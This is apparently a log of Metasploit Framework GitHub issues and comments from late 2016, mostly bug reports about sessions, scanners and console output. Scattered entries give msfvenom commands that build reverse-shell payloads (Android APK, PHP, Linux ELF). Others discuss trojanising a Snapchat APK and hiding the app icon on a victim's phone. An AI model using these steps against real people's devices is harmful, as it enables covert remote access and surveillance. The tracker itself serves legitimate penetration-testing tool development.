[2016-11-22 05:24] valerianrossigneux opened #7598 "set_timeouts -x 3600 is not honored and has no effect"
## Steps to reproduce

metasploit v4.13.0

Changing the timeout has no effect on the session. after a successful meterpreter connection I ran a set_timeouts -x 3600 as shown below:

[code]

But this session never expires, it will still show under sessions days after without activity.

## Expected behavior

Session should expire accordingly.

## Current behavior

Session never expire

[2016-11-22 05:43] busterb commented on #7598
The session expiration is handled on the meterpreter side, framework just tells the meterpreter what to do. For us to help, we'd first need to know which meterpreter you were running.

[2016-11-22 05:57] OJ commented on #7598
[code]
It's a Windows payload for sure.

[2016-11-22 05:58] OJ commented on #7598
OK so I think it's important to note that session expiry isn't detected on the MSF side with HTTP/S payloads. If you check for comms, you'll see that Meterp will definitely shut itself down. However, MSF isn't aware that the session isn't calling back any more. Instead, you'll notice that when you run `sessions -x` the last checkin time for the session will be REALLY long.

So in short, Meterp is

[2016-11-22 07:15] valerianrossigneux commented on #7598
Understood.

[2016-11-22 07:15] #7598 closed

[2016-11-22 07:17] valerianrossigneux commented on #7101
Yes it's quite consistent, after 3-4 days usually I cannot connect anymore and I have to restart the listener.

[2016-11-22 07:42] OJ commented on #7598
Cool thanks :) If you try it with `reverse_tcp` you'll see it actually terminate on the MSF side too.

[2016-11-22 12:35] busterb commented on #7598
I would have thought the keep-alive function would have noticed, regardless of the transport.

[2016-11-22 16:05] bwatters-r7 commented on #7582
@h00die, something like this got submitted internally a few days ago, and I tried to make a fix, but could not test it due to lack of response by the reporter.  I think the problem was in how the return data from data_connect was treated.  I wrote a fix for bison_ftp_traversal in https://github.com/bwatters-r7/metasploit-framework/tree/fix_nil_ftp_sock as a PoC, but never heard back if it fixed th

[2016-11-22 17:16] jinq102030 opened #7600 "The MSF will leak SSL socket if the HTTPS server close the socket without sending response"
## Steps to reproduce

[code]

## Expected behavior
The client side (MSF) will close the socket at the end.

## What happened?
The server side finished SSL handshake, client sent HTTP request, server didn't send anything, after 190 seconds, it sent FIN, client never sent the FIN, so the socket is in CLOSE_WAIT state forever.

### OS

Ubuntu 14.04

msf auxiliary(cisco_asa_asdm) > version
Framework:

[2016-11-22 17:44] jinq102030 commented on #7600
Found that after a successful run (verified a password through 3 HTTPS transactions), the client left two sockets open.

[2016-11-22 20:38] jinq102030 opened #7602 "OWA_LOGIN module may take too long to time out"
## Steps to reproduce

[code]

## Expected behavior
In case of HTTP Connection timeout, it should bail out (give up).

## What should happen?
It keeps trying different AD (such "aspnet_client", "Autodiscover" etc) making the process last for minutes.

### Metasploit version
msf auxiliary(owa_login) > version
Framework: 4.13.1-dev-3640e87
Console  : 4.13.1-dev-3640e87

### OS

Ubuntu 14.04

[2016-11-22 20:55] h00die commented on #7582
I think your fix looks a little better.  Mine was later on, which means we may/may not send the RETR command before bombing, whereas yours checks before that and seems a little safer (albeit more complex looking).

[2016-11-22 21:01] kaospunk commented on #7602
Set ENUM_DOMAIN to false and see how it responds for you.

[2016-11-22 21:22] wchen-r7 opened #7603 "undefined method `length' for nil:NilClass while generating a payload from msfconsole"
Error:
[code]

To reproduce, run:

[code]

[2016-11-22 21:56] mubix commented on #7603
I've run into this when MSF starts but just needs one more second or so to fully load. Not sure "where" you might find that bug, but if you just do a sleep, or run `exploit -j` in the command to run after the resource it works just fine.

[2016-11-23 04:26] mubix commented on #7101
@busterb thanks for looking into this, I will post if I run into it again

[2016-11-23 07:17] timwr commented on #7581
That command looks like the correct syntax, however I have not tested it. Add it to the co.rb autorunscript instead of shell.
I think I understand you, you only want the persistence script to run once per machine. You will need to write some ruby to handle this specific use case, perhaps by putting your persistence code inside an if statement that checks whether C:\Windows\system\system01.exe exis

[2016-11-23 07:17] #7581 closed

[2016-11-23 07:21] timwr commented on #7552
@VanishingTacos are you sure you're using the patch aswell?
See https://github.com/rapid7/metasploit-framework/pull/7584/files
It fixes the issue for me.

[2016-11-23 07:37] timwr commented on #6869
@Manouchehri I meant the question from @h00die: https://github.com/rapid7/metasploit-framework/issues/6869#issuecomment-219197741
I don't have access to the device but it looks like `/proc/sunxi_debug/sunxi_debug` is not accessible, maybe it's only accessible over adb?

[2016-11-23 19:48] jinq102030 opened #7608 "module auxiliary/scanner/http/cisco_nac_manager_traversal should have SSL turned on by default"
## Steps to reproduce

This module has the default RPORT as 443 but the SSL is not turned on by default. So when running it, it will send plain HTTP to server port 443.

[code]
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

[2016-11-23 20:08] wchen-r7 commented on #7603
Gotcha. I'll look into it. Thanks!

[2016-11-23 20:56] jinq102030 opened #7610 "Run auxiliary/scanner/http/cisco_ironport_enum and got good response and the module claimed connection failed."
## Steps to reproduce

[code]

[2016-11-23 21:25] jinq102030 commented on #7600
Fixed by PR #7607

[2016-11-23 21:25] #7600 closed

[2016-11-23 21:33] jinq102030 commented on #7602
Setting ENUM_DOMAIN caused the module to skip the step of check ad_domain.  It helps.

[2016-11-23 21:33] #7602 closed

[2016-11-24 01:20] h00die commented on #6869
the device in question is (unfortunately) embedded in my wall, and **very** difficult to get out...
https://www.amazon.com/gp/product/B018AEZY9E/ref=oh_aui_search_detailpage?ie=UTF8&psc=1 was the device, there seems to be 2 different (looking) ones now, I'm not sure if its the same device or not as the two currently for sale.
Next time the tablet freezes (about every 2-3 weeks) I'll pull it out of

[2016-11-24 15:21] #7603 closed

[2016-11-24 15:54] #7610 closed

[2016-11-24 16:16] h00die commented on #7582
@leebaird https://github.com/h00die/metasploit-framework/blob/00d9e69a981ee4fa709469b5ca8b2dd7bac3f654/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb incorporates @bwatters-r7 fix, as well as the one that was talked about in IRC.  Please let us know if it fixes the issue or not so we can propagate it to other similar modules.

[2016-11-24 20:17] cacaocaca opened #7613 "Exploit/multi/handler output strange"
## Steps to reproduce
Error Output when press enter on exploit/multi/handler the meterpreter session work right but i would like know what depend this error .
https://youtu.be/L9nQeqkwNhM
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected beh

[2016-11-25 05:18] pbarry-r7 commented on #7613
I tried this out earlier on my setup (Ubuntu 16.04 VM running MSF off master), didn't see the same behavior.  This evening we've had a second report of this behavior on MSF version v4.13.1-dev-5fdd5a7.  My money would be on the recent ANSI escape sequences we've landed, but only a thought at this moment...

[2016-11-25 05:21] bcook-r7 commented on #7613
Could be related to language. What does `echo $LANG` say?

[2016-11-25 05:25] pbarry-r7 commented on #7613
I had wondered the same, @bcook-r7, but it sounds like two other folks who I believe would have LANG settings similar to mine have also bumped into it ([Tim](https://github.com/rapid7/metasploit-framework/pull/7570#issuecomment-261709535) and [OJ](http://imgur.com/a/sQ2iI)).  But I'm no ANSI escape expert or anything...  ;)

[2016-11-25 05:35] pbarry-r7 commented on #7613
Sorry, I'm not trying to muddy the water here with any assumptions on my part (dangerous!).  @cacaocaca, could you share what $LANG is set to in your environment?  Here's mine:

[code]

[2016-11-25 05:36] OJ commented on #7613
[code]
And this is what I'm seeing quite often in my console:
![doh](http://i.imgur.com/tQqqCmq.png)

[2016-11-25 06:14] timothyleung opened #7614 "Apply exploits to RHOSTS instead of RHOST"
I think it will be great to have a module that can accomplish this in a generic way.
For example, the options that the module should take are:
 1. GenericExploit
 2. RHOSTS

I am thinking about extending either Auxiliary class or Exploit class to accomplish this. It will be great if you can give me some ideas on what do you think on this issue.

The difficulties here is different exploits have dif

[2016-11-25 06:42] bcook-r7 commented on #7613
Easy to see in gnome-terminal (or Kali's default setting). It definitely doesn't like the new escape sequences.

[2016-11-25 17:26] pbarry-r7 commented on #7613
Oof...

[2016-11-25 19:07] cacaocaca commented on #7613
http://imgur.com/a/Yq48s

[2016-11-25 20:10] OJ commented on #7613
This looks exactly like what we were discussing on IRC yesterday.

[2016-11-26 18:51] cacaocaca commented on #7613
How can i resolve it ?

[2016-11-26 19:08] raaafaaaaaaa opened #7616 "MSF Venom not hidding MainActivity apk from the app drawer"
## Steps to reproduce

How'd you do it?

1. msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > /root/Desktop/myapp.apk
2. Then I put it on my android device and install it
3.It doesn't hide form app drawer

## Expected behavior

What should happen?

MainActivity App doesn't hide in the app drawer

What happens instead?

Instead it appears there forever, even if i reboot the phon

[2016-11-26 19:46] vvalien commented on #7613
I am also seeing this, thought it was a issue with my install.

It's most likely a issue with the latest update to rex-text/lib/rex/text/unicode.rb

A little more info shows its injecting \x01\x02 which has to do with pre_color \ post_color as those are set to \x01 and \x02 respectively.

[2016-11-27 01:54] pbarry-r7 commented on #7613
I was able to repro in Kali (I pulled the latest ISO and updated the metasploit-framework package), but **only** if I gave the -L argument when starting the console (e.g. **msfconsole -L**) to use the system Readline Library.  If do that, I see the exact same behavior others are bumping into.

If I revert the recent ["nicer async output" PR](https://github.com/rapid7/metasploit-framework/pull/7570

[2016-11-27 01:57] OJ commented on #7613
+1 to this. Same story on my home machine.

I do see the issue in async cases, it's fine in sync.

[2016-11-27 04:08] timwr commented on #7616
You can use the hide_app_icon command that was added here:
https://github.com/rapid7/metasploit-framework/pull/7456

[2016-11-27 04:08] #7616 closed

[2016-11-27 07:53] keviiin38 opened #7617 "Msfvenom error with "Aligned.apk""
## Aligning error with msfvenom

I try :

And i get this output/error :

[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.snapchat.android
[*] Loading /tmp/d20161127-2760-1722k62/original/smali/com/snapchat/android/LandingPageActivity.smali and injecting payload..
[*] Poisoning the manif

[2016-11-27 20:14] h00die commented on #6869
Good news, froze today. What commands should I run? I'm not very familiar with `adb`

[2016-11-27 21:41] Manouchehri commented on #6869
@h00die Sounds like you're hitting this rule. https://android.googlesource.com/platform/external/sepolicy/+/8ae52a05ba30a4f7709d8bce381bfb3662e8cfea/app.te#388

Add a check in `allwinner_backdoor.rb` to make sure the file is writable first, then what you have should already work fine under Linux (and some Android kernels probably).

[2016-11-27 21:56] h00die commented on #6869
For research purposes though, what's the adb to see about that file. Just so we have a finite answer while it's pulled out of the wall

[2016-11-27 22:04] Manouchehri commented on #6869
What you had in https://github.com/rapid7/metasploit-framework/issues/6869#issuecomment-219196096 looks correct to me.

[code]

Looks like you have write access after spawning a shell, try doing it there (without adb) instead.

[code]

[2016-11-27 23:39] raaafaaaaaaa commented on #7616
How do i make it automatically hideable since the creation of the MainActivity.apk, without having to open a meterpreter session??

[2016-11-28 02:58] bcook-r7 commented on #7613
I have a fix for this. I can land it with the windows fix PR #7596

[2016-11-28 04:17] bcook-r7 commented on #7613
Fixed by 34aa79ca27211b06678e0aaf22f78a1b32ae5387 - let me know if you encounter any other issues.

CC @dmaloney-r7 - we need to make sure we at least check out future console behavior changes on Linux too 🎱

[2016-11-28 04:17] #7613 closed

[2016-11-28 12:33] kbeflo opened #7618 "Linking Metasploit installation folder"
Cloned metasploit-framework from `rapid7/metasploit-framework` to `/opt/` after that I did  `bundle install`.

After installation I linked metasploit-framework to `/usr/local/bin/`

    sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'`

Will there be any issue/disadvantage if I linked `metasploit-framework` instead of installing it into `bin`?

[2016-11-28 12:35] bayp1p0 opened #7619 "Metasploıt bad character error"
http://i.hizliresim.com/VPlXoq.jpg

How can ı solve this error help pls. S

[2016-11-28 14:08] pbarry-r7 commented on #7619
Hi, this has been raised (and the fix committed recently) in #7613.  If you are running off a clone of master, you can try it out.  Otherwise, it will get picked up in the build this coming Friday.

[2016-11-28 14:08] #7619 closed

[2016-11-28 14:13] bayp1p0 commented on #7619
I cant understand bro can you tell us on here ?

[2016-11-28 14:38] void-in commented on #7619
@bayp1p0 What @pbarry-r7 said is that the fix for the problem you mentioned is already committed to the github branch. However, depending on how you have installed Metasploit, the fix might or might not be available for you to apply. If you have cloned the Metasploit framework from Github, running git pull is going to get you the fix. If you are running it off of Kali, then you will have to wait t

[2016-11-28 14:43] busterb commented on #7619
I went ahead and put out metasploit-framework 4.13.2 with this fix in it, since it seems like more users will be impacted by it.

Usually Kali picks up releases on Friday when we release automatically, but I'll drop them a line to see if they want to grab this sooner than that. Thanks all.

[2016-11-28 15:09] raaafaaaaaaa opened #7620 "Msfvenom apk"
I need help, how can i make a automatically hiding apk in msfvenom without having to open a meterpreter session, the app automatically hides after installing it, like before.

I'm on Kali Linux/Parrot OS with metasploit framework console v4.13.0-dev.

[2016-11-28 17:07] invious opened #7621 "Webcam not working failing with "Operation failed: 2147943850""
Have a session on victim, webcam was working, then stopped Using non-persistent Kali Live USB, rebooted, same issue.

`metasploit-framework/scripts/meterpreter/webcam.rb`

[code]
`webcam_start: Operation failed:2147943850`

[2016-11-28 17:55] wchen-r7 commented on #7614
I like this idea, I've always wanted it too. However, this would be a challenge for the current architecture considering the handler is meant to receive only one type of payload by default.

For example, if you have a multi-platform exploit that targets Windows and Linux, and that a cross-platform payload isn't an option, your exploit would only work one of those platforms.

Also, some modules may

[2016-11-28 19:23] bcook-r7 commented on #7614
@wchen-r7 we are working on an actual 'Multi' handler for Meterpreter payloads - see the work that @OJ is currently engaged in.

I do believe that, even if we didn't have that, that this feature would still be useful much of the time.

[2016-11-28 20:11] wchen-r7 commented on #7614
@bcook-r7 Did you guys want to add the RHOSTS feature within the scope too? Or separate?

[2016-11-28 21:26] OJ commented on #7621
This sounds environment specific to me. The error code shown maps to `ERROR_NO_SYSTEM_RESOURCES`, and the reason the stack trace appears would be due to the script incorrectly handling error cases.

Why that error happens, I don't know. It could happen for many reasons. We do use DirectShow behind the scenes, and it's not uncommon for this error to happen if the webcam is already in use.

Rebootin

[2016-11-29 02:04] h00die commented on #6869
adb
[code]

[2016-11-29 02:14] h00die commented on #6869
from the posts before, when i dropped to a shell it looks like i have write access, but actually echoing in to it didn't work

[2016-11-29 18:38] jinq102030 opened #7628 "module "scanner/http/concrete5_member_list" should use lesser aggression in regular expression"
## Steps to reproduce

How'd you do it?

1. `use auxiliary/scanner/http/concrete5_member_list`
2. `set RHOSTS 127.0.0.1`
3. `run`
and notice the username in the output could be garbled.

[code]

### Metasploit version

[code]

### OS

Ubuntu 14.04

[2016-11-29 18:47] mubix opened #7629 "Windows Native x64 Meterpreter (http/s) handler non-functional"
## Steps to reproduce

How'd you do it?

1. Generate `payload/windows/x64/meterpreter/reverse_http` or httpos into EXE or DLL
2. Run `exploit/multi/handler` with the above payload
3. Run payload on victim
4. Shells come in, but they die after staging.

Victims tested, Win7 and Win10, both x64

![windows](https://cloud.githubusercontent.com/assets/679319/20723869/30b41a1e-b63a-11e6-9fa0-0375e9f44f0

[2016-11-29 18:49] mubix commented on #7629
cc: @OJ / @busterb

[2016-11-29 19:39] bcook-r7 commented on #7629
Not seeing this locally @mubix, though I'm using Ruby 2.3.3:

[code]

[2016-11-29 19:42] mubix commented on #7629
@bcook-r7 sorry, I tested reverse_http and reverse_https, not reverse_tcp, sorry for incorrect repo instructions

[2016-11-29 19:46] mubix commented on #7629
The logs are pretty sparse, all I'm getting is:
[code]

But in a couple instances I got this:
[code]
Might help track it down. Hitting a incorrect URI?

[2016-11-29 19:56] #7618 closed

[2016-11-29 20:55] jinq102030 opened #7632 "Module scanner/http/dell_idrac will keep trying different passwords after success"
## Steps to reproduce

How'd you do it?

1. `./msfconsole`
2. `run auxiliary/scanner/http/dell_idrac`
3. `set RHOSTS 127.0.0.1`
4. `run`

[code]

## Expected behavior
For each user, it should have stopped trying different password after getting a success.

## Current behavior
It kept trying all available passwords, even after successes.

### Metasploit version
[code]

### OS

Ubuntu 14.04

[2016-11-29 21:09] wchen-r7 commented on #7628
@jinq102030 Could you please give me a test box?

[2016-11-29 21:11] wchen-r7 commented on #7632
Fix in https://github.com/rapid7/metasploit-framework/pull/7633

[2016-11-29 23:40] bcook-r7 commented on #7629
Hmm, either that or it's timing out and the handler is getting cleaned up before it reconnects

[2016-11-30 00:43] timothyleung commented on #7614
Im thinking about using some OOP design. I will have a look at it and suggest some solutions.

[2016-11-30 02:12] kbeflo commented on #7618
github pls

[2016-11-30 04:07] busterb commented on #7629
Still not seeing it locally, sorry:
[code]

[2016-11-30 04:17] busterb commented on #7618
Are you trying to delete evidence of this issue existing?

[2016-11-30 04:30] Chiggins commented on #7563
Saw this, figured I'd try to verify as well. Doing exactly what @bwatters-r7 did, current master, and everything works fine and dandy.

[2016-11-30 05:37] Chiggins commented on #7628
I actually use concrete5 at work so I figured I'd look at this.

It looks like @jinq102030 might've already fixed this with commit https://github.com/rapid7/metasploit-framework/commit/1beeb99d44f57064767139091ff601e9f3f38b6e. Though with the current version of concrete5, I'm not sure this is actually valid anymore as it didn't work for me. The last module-specific work done on this was back in No

[2016-11-30 13:57] timwr commented on #7620
@raaafaaaaaaa unfortunately we removed the automatic hiding of the icon because it was confusing to people. We've added a hide_app_icon command to do it manually. If you wish to automatically have it run you can do the following before starting your handler:
[code]

[2016-11-30 13:57] #7620 closed

[2016-11-30 15:49] jinq102030 commented on #7628
@Chiggins Totally agree with you that it needs to be updated whenever possible.  Since you have access to the software, would be nice to identify whether the problem is still there (but with a different URL due to configuration) or the vulernability is fixed.

 I don't have the concrete5 software, instead, I just had an emulator.

[2016-11-30 16:07] Chiggins commented on #7628
@jinq102030 It's actually a free software that you can download and run yourself, just set up your own test VM with Apache, PHP, and MySQL running. https://www.concrete5.org/download

[2016-11-30 16:11] jinq102030 commented on #7628
Thanks @Chiggins for the link!

[2016-11-30 16:19] busterb commented on #7628
Something good to add to module documentation.

[2016-11-30 16:50] mubix commented on #7629
thanks for testing this out @busterb I will close this out for now and get back to you to you if I can narrow it down. Thanks :)

[2016-11-30 16:50] #7629 closed

[2016-11-30 16:51] Chiggins commented on #7628
@jinq102030 What's the version of concrete5 that you're testing against?

[2016-11-30 16:54] jinq102030 commented on #7628
@Chiggins I was testing with an emulator that emulates the old version (the version based on which the module was created originally).

[2016-11-30 17:17] Chiggins commented on #7628
@jinq102030 Well I was hoping you could provide the actual version number so I could install it on my own dev server and kind of look into this a little bit more.

[2016-11-30 17:54] wchen-r7 commented on #7628
@Chiggins I tried to look into this bug too, and yeah it doesn't work against the latest version of Concrete5. The module needs an upgrade.

I also don't see when the original module was created, lost some of that history there. But the first commit is from 2012, and the first release of Concrete was this: https://www.concrete5.org/download_file/-/view/33453/8497/

I should be able to patch the mo

[2016-11-30 18:11] wwebb-r7 opened #7637 "Create exploit module for new Firefox/TBB SMIL animation vulnerability"
Nothing to see here other than the fact that work is in progress on this.

[2016-11-30 19:49] nichlaspro opened #7638 "PHP Meterpreter session is invalid and gets closed"
## Steps to reproduce

How'd you do it?

1. msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=443 -f raw > /root/var/www/html/test.php

2. msfconsole
3. use exploit/multi/handler / set payload php/meterpreter/reverse_tcp
4. set LHOST 192.168.0.186 / set LPORT 443
5. exploit

6. Then the victim(192.168.0.197) connects to 192.168.0.186:443/test.php
Btw is the victim pc supposed to st

[2016-11-30 20:37] #7632 closed

[2016-11-30 20:52] #7628 closed

[2016-11-30 21:08] wchen-r7 commented on #7638
I can't say for sure, but this reminds me of: https://github.com/rapid7/metasploit-payloads/issues/95

[2016-11-30 21:09] wchen-r7 commented on #7608
Resolved in https://github.com/rapid7/metasploit-framework/pull/7609

[2016-11-30 21:09] #7608 closed

[2016-11-30 21:46] #7569 closed

[2016-11-30 21:50] nichlaspro commented on #7638
Hi @wchen-r7, i do not really know because the connection does get successfully established and is there for some seconds so not AS SOON as the session is found... But what about the commands? I mean how can i not have the "normal" commands like screenshot and sysinfo. Thanks for your time

[2016-11-30 22:07] wchen-r7 commented on #7638
PHP meterpreter doesn't necessarily have all the commands you see in Windows meterpreter. Personally, I would suggest you to upgrade to a platform-specific meterpreter (such as Windows or Linux) as soon as you get a session with the PHP meterpreter in order to access more functionalities.

My concern is more on the session dying part. I will at least try to see if I can reproduce this. I will let

[2016-11-30 22:23] jinq102030 opened #7640 ""auxiliary/scanner/http/cisco_ssl_vpn" fails even if server is responsive"
## Steps to reproduce

How'd you do it?

1. `run auxiliary/scanner/http/cisco_ssl_vpn`
2. `set RHOST 127.0.0.1`
3. `run`

[code]

## Expected behavior
The module should continue but it aborted.

### Metasploit version
msf auxiliary(cisco_ssl_vpn) > version
Framework: 4.13.3-dev-b6bb199
Console  : 4.13.3-dev-b6bb199

### OS

Ubuntu 14.04

[2016-11-30 22:27] jinq102030 commented on #7640
Should be fixed by PR #7641

[2016-11-30 22:43] nichlaspro commented on #7638
Well thanks!! But if you get it reproduced, can you then answer these questions:
1. Is it normal that the browser starts downloading the test.php when going to [ip of attacker]::[port]/[file] - Does same thing happen to you?
2. Does your sessions die fast?
3. How can you upgrade to a platform-specific meterpreter AFTER you get a session?

Thanks! I really appreciate your time :))

[2016-11-30 22:50] jnqpblc opened #7642 "Feature Request: Add a sort option to the services command"
It would be extremely stellar if someone would add a sort option to MSF's internal services command.

Example (Order by column):
msf >  services -O 2

[2016-11-30 22:55] wchen-r7 commented on #7638
I can answer 1 and 3 for you now.

For question 1, normally it should not be downloading the file. If it does, that tells me the web server is probably serving the browser some kind of inappropriate content type header? This may not be a big issue though as long as the web server is parsing PHP code. If you see the PHP code from the browser, then that's bad.

For question 3, um... well, this requi

[2016-11-30 22:58] OJ commented on #7638
`1` tends to mean that the target web server isn't configured to run `.php` files with the PHP interpreter. This will happen if you upload a `.php` file to an IIS server running .NET, for example.

[2016-11-30 23:05] raaafaaaaaaa commented on #7620
Ok thanks ;)

[2016-12-01 02:27] wvu-r7 commented on #7642
Any other commands?

[2016-12-01 03:08] Snipercatz commented on #7471
I'm so sorry for my delayed response. You mean like a .XML result file?  I tried but am not able to do so.  It says try again with a PNG. GIF, JPG, etc.

[2016-12-01 03:22] #7640 closed

[2016-12-01 03:23] wvu-r7 commented on #7640
@jinq102030: For your next PR: https://github.com/blog/1506-closing-issues-via-pull-requests. :)

[2016-12-01 06:26] reavitor commented on #7184
Did you find out how to execute ZoeLe?

[2016-12-01 07:22] nichlaspro commented on #7638
Well, at least it seems to work even though that the browser it downloading the content(I am using chrome on the victim machine). @OJ you mentioned something about configure the server to run php? I simply uploaded the file to /var/www/html/ on my Linux. Should that not work?
@wchen-r7, is this a good answer to 3 - http://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-met

[2016-12-01 11:03] timwr commented on #7617
I can reproduce this. I think it's an issue with apktool.

[2016-12-01 15:18] dana-at-cp commented on #7617
@timwr If you have other stuff to focus on then I can work on fixing this issue.

[2016-12-01 15:29] jinq102030 commented on #7640
That's nice tip! Thanks @wvu-r7

[2016-12-01 16:54] wchen-r7 commented on #7638
@nichlaspro That script is good for upgrading from a shell to a Meterpreter. You actually have a different scenario: You're switching from Meterpreter to Meterpreter.

[2016-12-01 17:19] nichlaspro commented on #7638
Why should you switch from Meterpreter to Meterpreter, is that what i am suppposed to do? :/ That just confused me

[2016-12-01 17:27] dmaloney-r7 commented on #7613
@bcook-r7 I actually did test this on linux, with and without Readline and it worked as expected, not sure what the difference in environments was

[2016-12-01 21:36] jinq102030 opened #7645 "module scanner/http/dolibarr_login causes a stack trace"
## Steps to reproduce

How'd you do it?

1. `run auxiliary/scanner/http/dolibarr_login`
2. `set RHOSTS 127.0.0.1`
3.  `run`
[code]

## System stuff

### Metasploit version
[code]

### OS

ubuntu 14.04

[2016-12-01 21:42] wchen-r7 commented on #7638
Hi @nichlaspro, I tried to look into this issue, and I'm not reproducing the problem.

The following log shows what I did. Basically, I got a session with php/meterpreter/reverse_tcp, and I waited for about 2 minutes:

[code]

However, just because I'm not able to reproduce, doesn't mean the bug doesn't exist. If you'd like, please provide me with some target info, such as: OS, version of the OS,

[2016-12-01 21:44] #7645 closed

[2016-12-01 21:54] wchen-r7 commented on #7638
@nichlaspro Also, here is an example of how you could switch from a PHP meterpreter shell to a Linux native. I'll be using 192.168.146.1 as an example for the attacker's IP:

1. Create a linux meterpreter as an executable:

[code]

2. In msfconsole, assuming you already have a PHP meterpreter session:

[code]

3. At the PHP meterpreter prompt, upload the binary that you generated with msfvenom. No

[2016-12-02 07:15] valerianrossigneux commented on #7101
How do you install 4.13.2 on Kali ? Should I add some apt resources ?
Mine says:
metasploit-framework is already the newest version (4.13.0-0kali1)

[2016-12-02 12:39] h00die commented on #7101
You have to download or clone directly from the git repo

[2016-12-02 14:26] nichlaspro commented on #7638
Hi again! Thank you so much - Now i got an idea about to to upgrade the shell but look.
I will now show you exactly what i do:

[code]

So here are my final questions(i guess) that cover the still ongoing issues.
1. On my windows pc it is downloading the file instead of just showing the content and i have to type the port in order to even make it start downloading, is that optimal? Look: https://s

[2016-12-02 14:38] busterb commented on #7613
Cool, what terminal emulator did you use? I tried xterm, gnome-terminal on Kali, Ubuntu, and Debian. Same bug on all of them.

Did you instead ssh to a Linux box from a Mac? That might not have shown the problem since it had to do with what characters the terminal emulator displayed, not the literal underlying OS (if that makes sense :)

[2016-12-02 15:11] jnqpblc commented on #7642
Not that I can think of at the moment.

[2016-12-02 15:46] wvu-r7 commented on #7642
There is a ```grep``` command.

[2016-12-02 16:23] dmohanty-r7 commented on #7463
sure thing @wchen-r7

[2016-12-02 17:36] wchen-r7 commented on #7638
Hi @nichlaspro,

For question 1: The URL looks a little weird for me. You are connecting to ```http://192.168.0.186:4444/thisisphp.php```.... so does that mean your web server is listening on port 4444? Normally web servers listen on port 80, so you would call your PHP meterpreter like this: ```http://192.168.0.186/thisisphp.php```. Could you please clarify on that a little?

For question 2: I don

[2016-12-02 18:36] dana-at-cp commented on #7617
@timwr I tested this with the exact APK referenced by @keviiin38 and the Apktool output suggests that there is a problem with the APK itself. It was probably tampered with before being uploaded on apkmirror.

[code]
The bug in apk.rb is that there is no error checking at the Apktool recompilation step. An improvement would be to detect that the Apktool build fails and let the user know (log the ca

[2016-12-02 18:42] jnqpblc commented on #7642
Look at that, there sure is a grep command... now only if there was a sort command... :D

[2016-12-02 19:46] dana-at-cp commented on #7617
@timwr FYI. I tested the latest version of SnapChat from the Google Play store and Apktool choked on the same smali file during the recompilation step:

[code]

Here's the attempt to manually do the recompilation:

[code]

[2016-12-02 19:48] wvu-r7 commented on #7642
Ah, misread you, lol. You meant a ```sort``` command *like* the ```grep``` command. Got it.

[2016-12-02 19:56] #7580 closed

[2016-12-02 20:03] nichlaspro commented on #7638
Okay first of all, thank you so much for taking time to help me!
I know that it is not optimal that i have to write the port in the victim browser but whenever i do that the browser starts downloading the actual php file. When i do type 192.168.0.186/payloaddd.php in the victim browser, it says "This site can't be reached". Like if there is some sort of issue in making the php file reachable. I ha

[2016-12-02 20:26] TheMayhamLab opened #7648 "auxiliary/scanner/snmp/snmp_login"
## Steps to reproduce

I found that a password containing the "@" character causes a false positive result when running the auxiliary/scanner/snmp/snmp_login module. This was apparent when I ran the module with the default password list of "/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt" and found all systems running SNMP on the network had two default passwords for a private

[2016-12-02 20:43] wchen-r7 commented on #7638
Hi @nichlaspro, after you clone Metasploit Framework, make sure you cd to the directory, and then execute ```./msfconsole```, and not ```msfconsole```. I suspect there are two different Frameworks installed on the machine.

[2016-12-02 21:22] nichlaspro commented on #7638
You are right, there are two. But when i have mounted the newly installed one and typed ./msfconsole, it says "run 'bundle install' to install missing gems.". So i do that but then it says: "make sure that 'gem install sqlite3 '1.3.12' succeeds before bundling.; Then i run "gem isntall sqlite3 '1.3.12' and it says it is not in the repository... wow.. I know this maybe is off topic but can you tell

[2016-12-02 21:39] nichlaspro commented on #7638
Okay so i successfully isntalled it and mounted it from home/metasploit-framework and then ran ./msfconsole.
Then i set up the lhost and port, payload, and exploited... but now i tried it on the actual attacker machine(linux) where i typed the URL 192.168.0.186/payloaddd.php and firefox said this

**Unable to connect

Firefox can't establish a connection to the server at 192.168.0.186.

    The si

[2016-12-02 22:02] bwatters-r7 commented on #7568
I can verify behavior on Windows 10x64 Build 14393

[2016-12-02 22:09] jnqpblc commented on #7642
The only feature I am asking for is a sort option within the services command, but will leave the implementation up to someone smarter as to what is a better; a global sort command or just a services sort option. Thanks!

[2016-12-02 23:46] wvu-r7 commented on #7642
I'm pretty familiar with the code in question, so I'll grab this. No guarantees. ;)

[2016-12-02 23:56] jinq102030 opened #7650 "Module scanner/http/etherpad_duo_login gives stack trace if HTTP server response doesn't have Server header"
## Steps to reproduce

How'd you do it?

1. `run scanner/http/etherpad_duo_login`
2. `set RHOSTS 127.0.0.1`
3. `set USERPASS_FILE userpass.lst`
4. `run`

[code]

## System stuff

### Metasploit version
msf auxiliary(etherpad_duo_login) > version
Framework: 4.13.3-dev-b6bb199
Console  : 4.13.3-dev-b6bb199

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a sou

[2016-12-03 02:32] jinq102030 commented on #7650
Hi @wvu-r7 , I meant to say making the change according to what YOU has suggested but I put it down as Wei.  Sorry. Thanks for the comment.

[2016-12-03 16:34] wvu-r7 commented on #7650
Hahaha. :)

[2016-12-03 19:12] #7650 closed

[2016-12-05 19:39] bwatters-r7 opened #7656 "Non-meterpreter sessions error out when using post modules."
## Steps to reproduce

On the current upstream-master: fe66ab31e2933d645ed6348952de6342a698354e
Generate a shell-based payload for linux:
```./msfvenom -a x64 -p linux/x64/shell/reverse_tcp -f elf -o revtcp_x64.elf LHOST=xxx.xxx.xxx.xxx LPORT=xxxx```

[code]

Once you have a session, background and try to use a post module
[code]

This appears to be because the base_platform attribute is only pres

[2016-12-05 21:53] OJ commented on #7656
This should have been handled already, as this was something I had found
during testing.

I'll look into this, thanks.

[2016-12-05 21:58] bcook-r7 commented on #7656
Note the work-in-progress in #7657

